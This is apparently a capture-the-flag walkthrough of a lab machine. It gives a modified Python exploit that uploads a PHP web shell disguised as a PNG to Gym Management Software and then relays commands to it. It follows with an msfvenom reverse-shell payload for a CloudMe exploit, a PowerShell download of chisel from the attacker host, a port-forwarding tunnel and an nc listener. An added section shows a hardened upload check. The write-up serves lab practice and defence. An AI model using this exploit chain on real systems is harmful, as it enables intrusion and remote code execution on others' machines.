Nmap scan
nmap -A -Pn -oN nmap.txt 10.10.10.198

Gym management software


Gym Management Software vulnerability
A web search turns up a vulnerability in Gym Management Software version 1.0: https://www.exploit-db.com/exploits/48506
The problem is that upload.php in the software package validates only the file extension and the file type; it performs no authentication check at all.

Customizing the original exploit script
import requests

# The following code is a modification of this source: https://www.exploit-db.com/exploits/48506
# The id is arbitrary, since authentication is not verified; only the file extension
# and the file type are checked.
url = "http://10.10.10.198:8080/upload.php?id=cyruslab"
success = "http://10.10.10.198:8080/upload/cyruslab.php"

# PNG signature, see https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/
# Kept as bytes: as a str it would be UTF-8 encoded on the wire and the first byte would no longer be 0x89.
png_magic_bytes = b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"
png = {
    "file": (
        "cyruslab.php.png",
        png_magic_bytes + b"<?php echo shell_exec($_GET['cmd']); ?>",
        "image/png",
        {"content-disposition": "form-data"},
    )
}
form_data = dict(pupload="upload")
resp = requests.post(url=url, files=png, data=form_data, verify=False)

if resp.status_code == 200:
    try:
        # Relay each command to the uploaded file and print whatever it sends back
        while True:
            user_input = input(">")
            cmd_output = requests.get(success, params={"cmd": user_input}, verify=False)
            if cmd_output.status_code == 200:
                print(cmd_output.text)
    except KeyboardInterrupt:
        print("\nBye!")
This is what the script output looks like. The terminal resembles a shell, but it is not one: the script uploads cyruslab.php to the vulnerable path, and cyruslab.php contains:
<?php echo shell_exec($_GET['cmd']); ?>
The script simply displays the result of each command back in the terminal.
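As an added illustration from the defender's side (not part of the original write-up or of the application's code), the weak function below models the class of check described above, and the hardened one closes each gap that the double extension, the prepended PNG signature and the unauthenticated id rely on. The real upload.php is not shown on the page, so weak_upload_check is an assumption about its shape, and the sample uploads are constructed.

```python
import re
import secrets

# Allow-list of image types with their real magic bytes (constructed for this example)
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
# Any PHP open tag, wherever it sits in the body
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed samples: the polyglot the write-up uploads, and a minimal genuine PNG header
POLYGLOT = MAGIC["png"] + b"<?php echo shell_exec($_GET['cmd']); ?>"
CLEAN_PNG = MAGIC["png"] + b"\x00\x00\x00\rIHDR" + bytes(17)


def weak_upload_check(filename, content_type, data):
    """Assumed shape of the flawed check: an image extension anywhere in the
    name plus a client-declared image/* type is enough, and no session is
    required. Returns True when the upload would be accepted."""
    has_image_ext = any(f".{ext}" in filename.lower() for ext in MAGIC)
    return has_image_ext and content_type.startswith("image/")


def hardened_upload_check(filename, content_type, data, session_user):
    """Returns (accepted, stored_name_or_reason). Requires a logged-in user,
    judges only the final extension, verifies the real magic bytes, refuses
    PHP tags hidden behind them, and names the stored file server-side so the
    id parameter never chooses the path. content_type is attacker-controlled
    and is deliberately ignored rather than trusted."""
    if not session_user:
        return False, "authentication required"
    _stem, dot, ext = filename.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in MAGIC:
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP tag"
    return True, f"{secrets.token_hex(8)}.{ext}"
```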
Get the user flag

Cloudme and its vulnerability
Enumerating shuan's home directory, a CloudMe program is found.

CloudMe uses port 8888 and listens on localhost on the victim's machine.

There is a working exploit written in Python: https://www.exploit-db.com/exploits/48389
The only item that needs to be changed in the original exploit script is the payload variable; the script's documentation recommends generating it with msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f python
Then paste the output into the script:

Lateral movement with chisel
Chisel can be downloaded here. Basically it is proxy software that can be used for port forwarding.
On the attacker machine start the chisel server:

Upload the Windows build of chisel to the victim machine.
Start the http server on attacker machine:
sudo python3 -m http.server 80
Then on the victim machine run this command:
powershell Invoke-WebRequest -Uri http://10.10.14.9/chisel.exe -OutFile chisel.exe
Then on the victim machine run the chisel client:
chisel.exe client 10.10.14.9:8443 R:8888:127.0.0.1:8888
A successful connection looks like this:


Whenever traffic is sent to 127.0.0.1:8888 on the attacker machine, it is tunneled to the victim machine and delivered to its localhost:8888.
Get the root flag
Set up the nc listener on the attacker machine:
nc -lvnp 4444
The port has to match the one configured when the msfvenom payload was generated.
Then run the exploit script modified with the generated msfvenom payload.
